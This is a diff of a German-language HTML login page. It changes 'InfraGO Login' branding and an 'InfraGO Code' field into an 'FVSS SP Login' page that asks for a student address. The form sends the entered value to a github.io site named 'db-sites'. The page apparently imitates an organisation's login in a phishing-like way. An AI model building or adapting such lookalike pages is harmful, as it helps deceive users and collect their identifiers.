--- a/loggingin.html
+++ b/loggingin.html
@@ -3,7 +3,7 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>InfraGO Login</title>
+    <title>FVSS SP Login</title>
     <link rel="icon" type="image/png" href="OIP.jpg">
     <style>
         body {
@@ -64,10 +64,10 @@
 </head>
 <body>
     <div class="login-container">
-        <img src="OIP.jpg" alt="Logo" style="width: 150px;">
+        <img src="IMG_0190.webp" alt="Logo" style="width: 150px;">
         <h1>Anmelden</h1>
         <form id="loginForm" action="https://db-sites.github.io/DBSITE/logedin" method="GET">
-            <input type="text" class="input-field" placeholder="InfraGO Code" name="email" required>
+            <input type="text" class="input-field" placeholder="Schueler Adresse" name="email" required>
             <div>
                 <button type="button" class="btn secondary-btn" onclick="window.history.back();">Zurück</button>
                 <button type="submit" class="btn">Weiter</button>
